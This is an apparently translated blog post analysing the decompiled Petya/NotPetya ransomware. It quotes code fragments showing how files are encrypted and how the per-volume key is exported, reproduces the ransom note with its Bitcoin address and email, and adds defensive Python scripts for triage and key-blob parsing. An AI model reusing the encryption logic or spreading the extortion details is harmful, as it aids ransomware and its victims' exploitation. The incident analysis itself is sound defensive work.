
Day after the Petya virus

I am not a writer, I am a reader. But I consider it necessary to share.

I'll be brief, so forgive me. This piece is only a wish to share the result of 10-12 hours of poring over the decompiled virus code.

For those interested, details below.

From the very beginning (it was about 13:00 on the 27th), after the first call from friends about the symptoms, I started monitoring the net for information. Unfortunately, there is still not much of it.

By 5 pm, a system unit (desktop PC) had been brought over to me.

So.

→ h**ps://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 - this is where the virus file came from.
→ h**ps://retdec.com/decompilation-run/ - this is where it was decompiled.

A caveat right away: I'm no coder, let alone a Windows one, so I had to spend quite a lot of time studying the resulting code.

There are actually two things I discovered and want to share.

1. Files smaller than 1 MB (0x100000 bytes) are encrypted in full. For larger files, only the first megabyte is encrypted:

    // 0x100018da
    if (v6 <= lpFileMappingAttributes) {
        if (lpFileSize <= 0x100000) {
            // 0x10001958
            dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize;
            pdwDataLen = dwNumberOfBytesToMap;
            dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1);
            // branch -> 0x100018eb
            // 0x100018eb
            hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes);
            dwFileOffsetHigh = lpFileMappingAttributes;
            if ((int32_t)hFileMappingObject != dwFileOffsetHigh) {
                // 0x100018ff
                pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap);
                v4 = (int32_t)pbData;
                hFile2 = v4;
                hHash = lpFileMappingAttributes;
                if (v4 != hHash) {
                    // 0x10001913
                    hKey = *(int32_t *)(a2 + 20);
                    v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow);
                    if (v5) {
                        // 0x1000192e
                        FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen);
                        // branch -> 0x10001938
                    }
                    // 0x10001938
                    UnmapViewOfFile((char *)hFile2);
                    // branch -> 0x1000193f
                }
                // 0x1000193f
                CloseHandle(hFileMappingObject);
                // branch -> 0x10001948
            }
            // 0x10001948
            handleClosed = CloseHandle(hFile);
            // branch -> 0x10001951
            // 0x10001951
            g8 = v1;
            g4 = v3;
            return (char *)handleClosed;
        }
    }
    // 0x100018e6
    pdwDataLen = (struct _LARGE_INTEGER *)0x100000;
    struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes;
    lpFileMappingAttributes2 = v8;
    v7 = v8;
    dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000;
    dwMaximumSizeLow = 0x100000;
    // branch -> 0x100018eb
    }

I noticed the same thing when scanning the encrypted files on the computer that was brought to me.
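The size threshold and the 16-byte rounding visible in the decompiled branch above translate directly into a triage check a responder can run over a recovered disk: a file whose first megabyte is high-entropy while the rest still reads as normal data matches the large-file pattern, and a small file is ciphertext end to end. The script below is an added example, not code from the original post or from the malware; the 0x100000 limit and the 16 * (size / 16 + 1) arithmetic are taken from the decompiled routine, the entropy threshold and the sample file bodies are constructed assumptions.

```python
import hashlib
import math
from collections import Counter

# Constants read off the decompiled routine: files of at most 0x100000 bytes are
# mapped and encrypted in full, larger files only for their first 0x100000 bytes.
ENCRYPT_LIMIT = 0x100000   # 1 MiB
CIPHER_BLOCK = 16          # AES block size, which dwMaximumSizeLow is rounded up to


def mapping_size(file_size: int) -> int:
    """Length of the view the routine maps, mirroring its arithmetic:
    16 * (size / 16 + 1) for small files (one spare block for the padding that
    CryptEncrypt adds on the final call), exactly 1 MiB for everything larger."""
    if file_size <= ENCRYPT_LIMIT:
        return CIPHER_BLOCK * (file_size // CIPHER_BLOCK + 1)
    return ENCRYPT_LIMIT


def shannon_entropy(data: bytes) -> float:
    """Entropy of the byte distribution in bits per byte (0.0 for empty input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, threshold: float = 7.5) -> str:
    """Triage one file body by contrasting the entropy of its first 1 MiB with the rest.
    'intact'          - the head is low-entropy, so it was not overwritten with ciphertext
    'fully-encrypted' - high-entropy head and nothing (or only ciphertext) after it
    'head-encrypted'  - high-entropy head followed by readable data: the large-file pattern"""
    head, tail = data[:ENCRYPT_LIMIT], data[ENCRYPT_LIMIT:]
    if shannon_entropy(head) <= threshold:
        return "intact"
    if not tail or shannon_entropy(tail) > threshold:
        return "fully-encrypted"
    return "head-encrypted"


# --- constructed sample data (not real files from the incident) -----------------

def _filler(n: int, seed: bytes = b"constructed ciphertext stand-in") -> bytes:
    """Deterministic high-entropy bytes standing in for ciphertext."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


PLAINTEXT = b"Quarterly report: revenue grew while costs stayed flat. " * 2000   # 112,000 bytes


def build_samples() -> dict:
    """Three constructed file bodies, one per outcome of classify()."""
    return {
        "untouched": PLAINTEXT,
        "small-file": _filler(mapping_size(len(PLAINTEXT))),   # <= 1 MiB: all ciphertext
        "large-file": _filler(ENCRYPT_LIMIT) + PLAINTEXT,      # > 1 MiB: ciphertext head, intact tail
    }


if __name__ == "__main__":
    for name, body in build_samples().items():
        print(f"{name:10s} {len(body):9d} bytes  -> {classify(body)}")
```

The head/tail contrast is the distinctive signal: an untouched file never has a high-entropy first megabyte followed by plain data. A file that is high-entropy throughout is ambiguous, since compressed formats (zip, docx, jpeg) look the same, so a real scanner should pair the "fully-encrypted" verdict with a magic-bytes check before counting the file as damaged.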

2. Each logical volume in the system is encrypted with its own key. At the root of each disk a README.TXT file is created, with the same contents as are shown on the screen after the encryption finishes and the machine reboots, as I understand it (I have not personally seen that screen). But the key differs between the two partitions of the disk that I examined.

Ooops, your important files are encrypted.

If you see this text, then your files are no longer accessible, because
they have been encrypted. Recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.

We can recover your files safely and easily.
All the need to do so.

Please follow the instructions:

1. Send $300 worth of Bitcoin to the following address:

1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

2. Send your Bitcoin wallet ID to wowsmith123456@posteo.net.
Your personal installation key:

AQIAAA5mAAAApAAAuoxiZtYONU+IOA/XL0Yt/lsBOfNmT9WBDYQ8LsRCWJbQ3iTs
Ka1mVGVmMpJxO+bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6
6kxuvs7U/fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV
Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA+NJmVM7CKPCRFc82UIQNZY/CDz/db
1IknT/oiBDlDH8fHDr0Z215M3lEy/K7PC4NSk9c+oMP1rLm3ZeL0BbGTBPAZvTLI
LkKYVqRSYpN+Mp/rBn6w3+q15DNRlbGjm1i+ow==

Here I would like to ask for help from experts in cryptography.

    void function_10001c7f(void) {
        int32_t dwFlags = 0; // ebx
        int32_t hKey = *(int32_t *)(g3 + 20); // 0x10001ca0
        int32_t pdwDataLen = 0;
        int32_t v1;
        if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) {
            // 0x10001d2a
            g3 = (int32_t)NULL;
            g4 = v1;
            return;
        }
        char * memoryHandle = LocalAlloc(64, pdwDataLen); // 0x10001cb1
        if ((int32_t)memoryHandle == dwFlags) {
            // 0x10001d2a
            g3 = (int32_t)NULL;
            g4 = v1;
            return;
        }
        int32_t hExpKey = *(int32_t *)(g3 + 12); // 0x10001cc6
        int32_t hKey2 = *(int32_t *)(g3 + 20); // 0x10001cc9
        if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) {
            int32_t pcchString = dwFlags;
            bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString); // 0x10001ce8
            if (v2) {
                char * memoryHandle2 = LocalAlloc(64, 2 * pcchString); // 0x10001cf6
                int32_t hMem = (int32_t)memoryHandle2; // 0x10001cf6_6
                if (hMem == dwFlags) {
                    // 0x10001d21
                    LocalFree(memoryHandle);
                    // branch -> 0x10001d2a
                    // 0x10001d2a
                    g3 = (int32_t)NULL;
                    g4 = v1;
                    return;
                }
                // (the listing ends here in the original post)

The third parameter of CryptExportKey is 1 (SIMPLEBLOB), i.e. the export of the session key, wrapped with the exchange key passed as the second parameter. And this key, as I understand it, is what ends up in README.TXT.

The actual question is: is it possible to import it and decrypt the files? This is not a public key. Obviously, with the private key there would be no problem.
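The question can be assessed from the blob format itself. function_10001c7f above exports the key with blob type 1 (SIMPLEBLOB) and then runs it through CryptBinaryToStringW with flag 1 (CRYPT_STRING_BASE64), which is exactly the text printed under "Your personal installation key" in the note. The parser below is an added example, not code from the original post: it reverses the base64 step on the installation key quoted above and reads the SIMPLEBLOB header using the layout and constant values documented in wincrypt.h. The interpretation of the trailing bytes as one RSA modulus-length block follows the documented SIMPLEBLOB layout and is the only inference made here.

```python
import base64
import struct

# CryptoAPI blob constants (values from wincrypt.h).
SIMPLEBLOB = 0x01           # bType of a wrapped session key: the "1" passed to CryptExportKey
CUR_BLOB_VERSION = 0x02
ALG_NAMES = {
    0x660e: "CALG_AES_128",
    0x660f: "CALG_AES_192",
    0x6610: "CALG_AES_256",
    0xa400: "CALG_RSA_KEYX",
}

# The "personal installation key" exactly as printed in the README.TXT quoted above,
# with only the line breaks removed.
NOTE_KEY_B64 = (
    "AQIAAA5mAAAApAAAuoxiZtYONU+IOA/XL0Yt/lsBOfNmT9WBDYQ8LsRCWJbQ3iTs"
    "Ka1mVGVmMpJxO+bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6"
    "6kxuvs7U/fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV"
    "Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA+NJmVM7CKPCRFc82UIQNZY/CDz/db"
    "1IknT/oiBDlDH8fHDr0Z215M3lEy/K7PC4NSk9c+oMP1rLm3ZeL0BbGTBPAZvTLI"
    "LkKYVqRSYpN+Mp/rBn6w3+q15DNRlbGjm1i+ow=="
)


def parse_simpleblob(blob: bytes) -> dict:
    """Parse a CryptoAPI SIMPLEBLOB as documented for CryptExportKey:
    BLOBHEADER {bType, bVersion, reserved, aiKeyAlg} (8 bytes, little-endian),
    ALG_ID of the key that wrapped the session key (4 bytes),
    then the session key encrypted under that key (for RSA: one modulus-length block)."""
    if len(blob) < 12:
        raise ValueError("too short for a SIMPLEBLOB")
    b_type, b_version, _reserved, key_alg = struct.unpack_from("<BBHI", blob, 0)
    if b_type != SIMPLEBLOB or b_version != CUR_BLOB_VERSION:
        raise ValueError(f"not a SIMPLEBLOB: bType=0x{b_type:02x} bVersion=0x{b_version:02x}")
    (wrap_alg,) = struct.unpack_from("<I", blob, 8)
    wrapped = blob[12:]
    return {
        "session_key_alg": ALG_NAMES.get(key_alg, hex(key_alg)),
        "wrapping_alg": ALG_NAMES.get(wrap_alg, hex(wrap_alg)),
        "wrapped_key_len": len(wrapped),
        "wrapping_key_bits": len(wrapped) * 8,  # RSA PKCS#1 v1.5 output is modulus-sized
    }


def is_simpleblob(blob: bytes) -> bool:
    """Cheap header-only check, e.g. for scanning README files collected from hosts."""
    return len(blob) >= 12 and blob[0] == SIMPLEBLOB and blob[1] == CUR_BLOB_VERSION


def describe_note_key(b64: str = NOTE_KEY_B64) -> dict:
    """Undo the CryptBinaryToStringW(..., CRYPT_STRING_BASE64) step and parse the blob."""
    return parse_simpleblob(base64.b64decode(b64, validate=True))


if __name__ == "__main__":
    for field, value in describe_note_key().items():
        print(f"{field:18s} {value}")
```

Run on the key from the note, the header reads aiKeyAlg = CALG_AES_128 and the wrapping algorithm = CALG_RSA_KEYX, followed by 256 bytes of ciphertext, i.e. an AES-128 session key encrypted to a 2048-bit RSA key-exchange key. That is what decides the question: CryptImportKey accepts a SIMPLEBLOB only when the hPubKey handle it is given is the exchange key pair, private half included, because the session key must be unwrapped first. The blob in README.TXT is therefore the per-volume key in a form that only the holder of the matching RSA private key can open.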

Actually, I paid most attention to the encryption functions; the rest did not interest me.

Well, a layman's opinion: this attack is a continuation of the May campaign, whose goal, apparently, was not achieved, because the roughly 160-180 thousand sitting in the wallets since that attack have not been touched. If the goal had been money, they would have started laundering it. In a little more than a day, just over $10,000 has been transferred to the wallet 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. This, of course, is a consequence of the fact that last time nobody received any decryption keys.

I hope my first article will not be my last. I will gladly correct any errors that come up.

Source: https://habr.com/ru/post/331978/

